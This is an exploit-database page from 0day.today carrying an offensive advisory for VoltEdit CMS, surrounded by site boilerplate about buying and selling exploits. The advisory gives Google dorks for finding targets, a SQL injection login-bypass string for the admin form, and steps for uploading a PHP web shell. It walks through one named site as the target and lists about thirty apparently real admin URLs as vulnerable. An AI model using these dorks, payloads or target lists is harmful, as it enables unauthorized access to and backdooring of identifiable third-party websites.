0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
VoltEdit CMS SQL Injection / Shell Upload Vulnerabilities
========================================================================================== VoltEdit CMS SQL Injection Admin Login Bypass & Shell Upload Vulnerability ========================================================================================== :----------------------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : VoltEdit CMS SQL Injection Admin Login Bypass & Shell Upload Vulnerability : # Date : 18 August 2013 : # Author : X-Cisadane : # CMS Developer : http://www.ady-voltedge.com/website_development.php : # Version : ALL : # Category : Web Applications : # Vulnerability : SQL Injection Admin Login Bypass & Shell Upload Vulnerability : # Tested On : Version 26.0.1410.64 m (Windows XP SP 3 32-Bit English) : # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari :----------------------------------------------------------------------------------------------------------------------------------------: A multiple vulnerabilities has been identified in "VoltEdit CMS", which could be exploited by attackers to bypass security restrictions into admin panel. Login input is not well sanitized in admin.php which can lead to to include some specials chars used to change SQL syntax so we can gain admin access. Successful exploitations allows attacker to access into administrative functions without requiring knowledge of the password. An attackers while login as admin, may upload PHP Shell (Backdoor) use the document uploader feature. DORKS (How to find the target) : ================================ intext:VoltEdit cms inurl:/doing_business_here.php inurl:/map_room.php inurl:/colleges_universities.php Or use your own Google Dorks :) Proof of Concept ================ [ 1 ] SQL Injection Admin Login Bypass Find the target use the dorks above, for example I'm use this dork inurl:/doing_business_here.php and got the target www.russellville.org/doing_business_here.php Change the target URL to /admin.php, for example www.russellville.org/admin.php After login form appeared, fill the Login ID and Password with '=0# Gotcha! Pic : http://i43.tinypic.com/fmtesh.png [ 2 ] Uploading Shell / PHP Backdoor After login with Administrator Previllege, you can upload PHP Shell Click Documents menu & Click Choose File Upload your PHP Shell Go to http://TARGET/documents/Your Shell.php Example : http://www.russellville.org/documents/botak.php3 Example of the Vulnerable Sites : http://www.businessreadywi.com/admin.php http://www.adyvoltedge.com/index.php http://www.jcjdc.net/admin.php http://www.cortlandbusiness.com/admin.php http://www.morgancoed.com/admin.php http://www.russellville.org/admin.php http://drumcountrybusiness.com/admin.php http://madisoncountyida.com/admin.php http://chooseeasterniowa.com/admin.php http://www.putnamcountyindianaeconomicdevelopment.com/admin.php http://www.foxcitiesregionalpartnership.com/admin.php http://www.wedobusinesswi.com/admin.php http://cayuga.adyvoltedge.com/admin.php http://edwc.org/admin.php http://www.russellville.org/admin.php http://www.hancockedc.com/admin.php http://www.purelansing.com/admin.php http://www.mcedinc.com/admin.php http://www.ocedp.com/admin.php http://scottcountyin.com/admin.php http://www.putnamcountyindianaeconomicdevelopment.com/admin.php http://nchcedc.org/admin.php http://www.jaspercountyin.com/admin.php http://michiana.adyvoltedge.com/admin.php http://www.thevalleypartnership.com/admin.php http://scott.ady-voltedge.com/admin.php http://highland.ady-voltedge.com/admin.php etc ... # 0day.today [2024-12-25] #